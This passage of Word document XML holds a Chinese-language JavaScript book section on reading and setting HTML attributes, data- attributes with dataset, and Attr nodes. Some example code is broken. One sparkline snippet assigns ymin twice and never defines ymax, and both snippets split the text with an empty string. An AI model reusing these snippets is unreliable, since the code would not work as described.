        <w:t xml:space="preserve">　获取和设置非标准</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="366"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如上所述，</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLElement</w:t>
      </w:r>
      <w:r>
        <w:t>和其子类型定义了一些属性，它们对应于元素的标准</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>类型还定义了</w:t>
      </w:r>
      <w:r>
        <w:t>getAttribute()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setAttribute()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来查询和设置非标准的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:r>
        <w:t>，也可用来查询和设置</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档中元素上的属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var image=document.images[0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var width=parseInt(image.getAttribute("WIDTH"));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>image.setAttribute("class","thumbnail");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>上述代码给出了这些方法和前面的基于属性的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>之间两个重要的区别。首先，属性值都被看做是字符串。</w:t>
      </w:r>
      <w:r>
        <w:t>getAttribute()</w:t>
      </w:r>
      <w:r>
        <w:t>不返回数值、布尔值或对象。其次，方法使用标准属性名，甚至当这些</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>名称为</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>保留字时也不例外。对</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素来说，属性名不区分大小写。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>类型还定义了两个相关的方法，</w:t>
      </w:r>
      <w:r>
        <w:t>hasAttribute()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>removeAttribute()</w:t>
      </w:r>
      <w:r>
        <w:t>，它们用来检测命名属性是否存在和完全删除属性。当属性为布尔值时这些方法特别有用：有些属性（如</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>的表单元素的</w:t>
      </w:r>
      <w:r>
        <w:t>disabled</w:t>
      </w:r>
      <w:r>
        <w:t>属性）在一个元素中是否存在是重点关键，而其值却无关紧要。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果操作包含来自其他命名空间中属性的</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档，可以使用这</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个方法的命名空间版本：</w:t>
      </w:r>
      <w:r>
        <w:t>getAttributeNS()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>setAttributeNS()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>hasAttributeNS()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>removeAttributeNS(</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>。这些方法需要两个属性名字符串作为参数，而不是一个。第一个是标识命名空间的</w:t>
      </w:r>
      <w:r>
        <w:t>URI</w:t>
      </w:r>
      <w:r>
        <w:t>，第二个通常是属性的本地名字，在命名空间中是无效的。但特别地，</w:t>
      </w:r>
      <w:r>
        <w:t>setAttributeNS()</w:t>
      </w:r>
      <w:r>
        <w:t>的第二个参数应该是属性的有效名字，它包含命名空间的前缀。可以在本书的第四部分中阅读更多关于命名空间识别的属性的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="367" w:name="15_4_3_Shu_Ju_Ji_Shu_Xing_"/>
      <w:r>
        <w:t>15.4.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　数据集属性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="367"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>有时候在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素上绑定一些额外的信息也是很有帮助的，当</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>选取这些元素并以某种方式操纵这些信息时就是很典型</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>的情况。有时可以通过给</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性添加特殊的标识符来完成。其他时</w:t>
      </w:r>
      <w:r>
        <w:t>候针对更复杂的数据，客户端程序员会借助使用非标准的属性。如上所述，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>getAttribute()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setAttribute()</w:t>
      </w:r>
      <w:r>
        <w:t>来读和写非标准属性的值。但为此而付出的代价是文档将不再是合法有效的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>提供了一个解决方案。在</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>文档中，任意以</w:t>
      </w:r>
      <w:r>
        <w:t>"data-"</w:t>
      </w:r>
      <w:r>
        <w:t>为前缀的小写的属性名字都是合法的。这些</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>数据集属性</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>将不会对其元素的表现产生影响，它们定义了一种标准的、附加额外数据的方法，并不是在文档合法性上做出让步。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>还在</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象上定义了</w:t>
      </w:r>
      <w:r>
        <w:t>dataset</w:t>
      </w:r>
      <w:r>
        <w:t>属性。该属性指代一个对</w:t>
      </w:r>
      <w:r>
        <w:t>象，它的各个属性对应于去掉前缀的</w:t>
      </w:r>
      <w:r>
        <w:t>data-</w:t>
      </w:r>
      <w:r>
        <w:t>属性。因此</w:t>
      </w:r>
      <w:r>
        <w:t>dataset.x</w:t>
      </w:r>
      <w:r>
        <w:t>应该保存</w:t>
      </w:r>
      <w:r>
        <w:t>data-x</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值。带连字符的属性对应于驼峰命名法属性名：</w:t>
      </w:r>
      <w:r>
        <w:t>data-jquery-test</w:t>
      </w:r>
      <w:r>
        <w:t>属性就变成</w:t>
      </w:r>
      <w:r>
        <w:t>dataset.jqueryTest</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>看一个更具体的例子，假设文档包含如下标记：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>span class="sparkline"data-ymin="0"data-ymax="10"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>1 1 1 2 2 3 4 5 5 4 3 5 6 7 7 4 2 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/span</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>火花线（</w:t>
      </w:r>
      <w:r>
        <w:t>sparkline</w:t>
      </w:r>
      <w:r>
        <w:t>）是个小图案</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>通常是</w:t>
      </w:r>
      <w:r>
        <w:t>一条线</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>设计用来在文本流中显示。为了生成一条火花线，也许可以同如下代码提取上述</w:t>
      </w:r>
      <w:r>
        <w:t>dataset</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>假设</w:t>
      </w:r>
      <w:r>
        <w:t>ES5</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Array.map()</w:t>
      </w:r>
      <w:r>
        <w:t>方法（或类似能工作的方法）有定义</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var sparklines=document.getElementsByClassName("sparkline");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>sparklines.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var dataset=sparklines[i].dataset;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var ymin=parseFloat(dataset.ymin</w:t>
      </w:r>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var ymax=parseFloat(dataset.ymax);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var data=sparklines[i].textContent.split("").map(parseFloat);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>drawSparkline(sparklines[i],ymin,ymax,data);//</w:t>
      </w:r>
      <w:r>
        <w:t>该方法未实现</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在写本书的这段时间中，</w:t>
      </w:r>
      <w:r>
        <w:t>dataset</w:t>
      </w:r>
      <w:r>
        <w:t>属性还没有在当前的浏览器中实现，上述代码应该写成这样：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>sparklines=document.getElementsByClassName("sparkline");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>sparklines.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var elt=sparklines[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var ymin=parseFloat(elt.getAttribute("data-ymin"));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var ymin=parseFloat(elt.getAttribute("data-ymax"));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var points=elt.getAttribute("data-</w:t>
      </w:r>
      <w:r>
        <w:t>points");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var data=elt.textContent.split("").map(parseFloat);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>drawSparkline(elt,ymin,ymax,data);//</w:t>
      </w:r>
      <w:r>
        <w:t>该方法未实现</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注意，</w:t>
      </w:r>
      <w:r>
        <w:t>dataset</w:t>
      </w:r>
      <w:r>
        <w:t>属性是（或将是，当实现以后）元素的</w:t>
      </w:r>
      <w:r>
        <w:t>data-</w:t>
      </w:r>
      <w:r>
        <w:t>属性的实时、双向接口。设置或删除</w:t>
      </w:r>
      <w:r>
        <w:t>dataset</w:t>
      </w:r>
      <w:r>
        <w:t>的一个属性就等同于设置或移除对应元素的</w:t>
      </w:r>
      <w:r>
        <w:t>data-</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>上述例子中的</w:t>
      </w:r>
      <w:r>
        <w:t>drawSparkline()</w:t>
      </w:r>
      <w:r>
        <w:t>函数是虚构的，但例</w:t>
      </w:r>
      <w:r>
        <w:t>21-13</w:t>
      </w:r>
      <w:r>
        <w:t>给出了用＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素绘制类似火花线的标记代码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="368" w:name="15_4_4_Zuo_Wei_AttrJie_Dian_De_Shu_Xing_"/>
      <w:r>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:t>.4.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　作为</w:t>
      </w:r>
      <w:r>
        <w:t>Attr</w:t>
      </w:r>
      <w:r>
        <w:t>节点的属性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="368"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>还有一种使用</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>的属性的方法。</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>类型定义了</w:t>
      </w:r>
      <w:r>
        <w:t>attributes</w:t>
      </w:r>
      <w:r>
        <w:t>属性。针对非</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象的任何节点，该属性为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。对于</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>对象，</w:t>
      </w:r>
      <w:r>
        <w:t>attributes</w:t>
      </w:r>
      <w:r>
        <w:t>属性是只读的类数组对象，它代表元素的所有属性。类似</w:t>
      </w:r>
      <w:r>
        <w:t>NodeLists</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>attributes</w:t>
      </w:r>
      <w:r>
        <w:t>对象也是实时的。它可以用数字索引访问，这意味着可以枚举元素的所有属性。并且，它也可以用属性名索引：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.body.attributes[0]//</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的第一个属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:t>.body.attributes.bgcolor//</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>bgcolor</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>document.body.attributes["ONLOAD"]//</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>body</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>onload</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当索引</w:t>
      </w:r>
      <w:r>
        <w:t>attributes</w:t>
      </w:r>
      <w:r>
        <w:t>对象时得到的值是</w:t>
      </w:r>
      <w:r>
        <w:t>Attr</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
      <w:r>
        <w:t>Attr</w:t>
      </w:r>
      <w:r>
        <w:t>对象一类特殊的</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>，但从来不会像</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>一样去用。</w:t>
      </w:r>
      <w:r>
        <w:t>Attr</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>属性返回该属性的名字和值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="369" w:name="15_5_Yuan_Su_De_Nei_Rong_"/>
      <w:r>
        <w:t>15.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　元素的内容</w:t>
      </w:r>
      <w:bookmarkEnd w:id="369"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>再看一下图</w:t>
      </w:r>
      <w:r>
        <w:t>15-1</w:t>
      </w:r>
      <w:r>
        <w:t>，并问自己一个问题：＜</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>内容</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>是什么？回答这个问题也许有</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>个方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>内容是</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>字</w:t>
      </w:r>
      <w:r>
        <w:t>符串</w:t>
      </w:r>
      <w:r>
        <w:t>"This is a</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>simple</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/i</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>document"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>内容是纯文本字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"This is a simple document"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>内容是一个</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点、一个包含了一个</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>子节点的</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>节点和另外一个</w:t>
      </w:r>
      <w:r>
        <w:t>Text</w:t>
      </w:r>
      <w:r>
        <w:t>节点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>每一种回答都有效，并且各有千秋。后面几节解释如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表示、纯文本表示和元素内容的树状表示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="370" w:name="15_5_1_Zuo_Wei_HTMLDe_Yuan_Su_Nei_Rong_"/>
      <w:r>
        <w:t>15.5.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　作为</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>的元素内容</w:t>
      </w:r>
      <w:bookmarkEnd w:id="370"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>读取</w:t>
      </w:r>
      <w:r>
